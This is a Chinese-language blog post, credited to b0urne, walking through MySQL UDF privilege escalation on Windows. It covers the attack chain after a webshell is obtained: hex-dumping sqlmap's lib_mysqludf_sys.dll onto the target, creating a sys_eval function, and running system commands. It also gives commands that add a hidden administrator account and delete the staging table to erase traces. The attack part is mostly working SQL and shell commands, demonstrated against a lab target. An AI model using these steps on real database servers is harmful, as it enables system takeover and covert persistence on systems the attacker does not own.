0x01-udf是什么?
udf = ‘user defined function’,即‘用户自定义函数’。是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。udf在mysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。
通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system权限。
那么如何使用udf呢?
0x02-如何使用udf?
假设我的udf文件名为‘udf.dll’,存放在Mysql根目录(通过select @@basedir可知)的‘lib/plugin’目录下。在udf中,我定义了名为sys_eval的mysql函数,可以执行系统任意命令。如果我现在就打开mysql命令行,使用select sys_eval(‘dir’);的话,系统会返回sys_eval()函数未定义。因为我们仅仅是把‘udf.dll’放到了某个文件夹里,并没有引入。类似于面向对象编程时引入包一样,如果没有引入包,那么这个包里的类你是用不了的。
所以,我们应该把‘udf.dll’中的自定义函数引入进来。看一下官方文档中的语法:
不要慌,看看实例用法:
1 |
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; |
只有两个变量,一个是function_name(函数名),我们想引入的函数是sys_eval。还有一个变量是shared_library_name(共享包名称),即‘udf.dll’。
至此我们已经引入了sys_eval函数,下面就是使用了。
这个函数用于执行系统命令,用法如下:
1 |
select sys_eval('cmd command'); |
0x03-使用udf提权
现在我们已经知道了udf是什么,以及如何引入udf。下面我们要关注的就是提权了。其实到这里,提权已经结束了,因为对于sys_eval()函数,其中的指令是直接以管理员的权限运行的,所以这也就是最高权限了。
下面来整理一下思路:
- 将udf文件放到指定位置
- 从udf文件中引入自定义函数(user defined function)
- 执行自定义函数
注意:
-
mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下
-
mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。
-
掌握mysql数据库的账户,从拥有对mysql的
insert和delete权限,以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限。
环境: 本机os: win10 靶机os: win7 php: 5.4.45 mysql: 5.5
1、本地mysql将udf.dll转换为16进制
先看第一步,拿到一个网站的webshell之后,在指定位置创建udf文件。如何创建?先别忘了,现在连源udf文件都没有。sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本,否则会显示:Can’t open shared library ‘udf.dll’。获取sqlmap的udf请看链接:MySQL 利用UDF执行命令
然后将获得的udf.dll文件转换成16进制,一种思路是在本地使用mysql函数hex:
1 |
SELECT hex(load_file(0x433a5c5c55736572735c5c6b61316e34745c5c4465736b746f705c5c6c69625f6d7973716c7564665f7379732e646c6c)) into dumpfile 'C:\\Users\\ka1n4t\\Desktop\\gg.txt'; |
此时gg.txt文件的内容就是udf文件的16进制形式。
接下来就是把本地的udf16进制形式通过我们已经获得的webshell传到目标主机上。
2、将16进制的udf.dll导入到目标机
1 |
1. CREATE TABLE udftmp (c blob); //新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。 |
上面第3步,mysql5.1以上的版本是默认没有plugin目录的,网上有说可以使用ntfs数据流创建:
即:利用NTFS ADS创建lib目录
1 |
Copyselect test into dumpfile 'H:\\PHPStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; |
但是我本地测试一直没有成功。后来又在网上看了很多,都是用这种方法,看来是无解了。在t00ls上也有人说数据流从来没有成功过,所以说mysql5.1以上的提权能否成功还是个迷。
为了演示,在这里我是手工创建了个plugin目录(ps: 勿喷啦,我用的phpstudy环境,重新安装一个mysql的话有可能会冲突,所以就没搞,毕竟原理都一样)。
继续,到这儿如果没有报错的话就说明已经在目标主机上成功生成了udf文件。
3、创建udl自定义函数
下面要导入udf函数:
1 |
1. DROP TABLE udftmp; //为了删除痕迹,把刚刚新建的udftmp表删掉 |
4、执行自定义函数
导入成功的话就可以使用了:
1 |
SELECT sys_eval('ipconfig'); |
附几个常用的cmd指令,用于添加一个管理员用户:
1 |
net user ka1n4t ka1n4t~!@ /add //添加新用户:ka1n4t,密码为ka1n4t~!@ |
0x04 SQLmap利用
自动化注入工具Sqlmap已经集成了此功能。
在 sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_
(sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_,但是64位的测试失败)
但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。
可以利用sqlmap 自带的解码工具cloak.py
目录 sqlmap\extra\cloak\cloak.py 对 sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_ 解码后,再直接利用。
首先进入到 sqlmap\extra\cloak\cloak 目录下,执行命令:
1 |
cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_ |
在 D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_会生成 lib_mysqludf_sys.dll
攻击者可以利用lib_mysqludf_sys提供的函数执行系统命令。
函数:
sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
sys_set,创建或修改一个环境变量。
目标机以windows为例,MySQL版本为5.6
攻击过程中,首先需要将lib_mysqludf_sys ( 目标为windows时,lib_mysqludf_sys.dll;linux时,lib_mysqludf_sys.so)上传到数据库能访问的路径下。
然后,创建UDF。
lib_mysqludf_sys.dll的导出路径:
MySQL<5.0,导出路径随意;
5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:system32)
MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。
创建相应的函数:
create function sys_eval returns string soname ‘udf.dll’;
执行命令:
select sys_eval(‘whoami’);
select sys_eval(‘net user fvck fvck /add’);
select sys_eval(‘net localgroup administrators fvck /add’);
FROM :b0urne.top | Author:b0urne
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论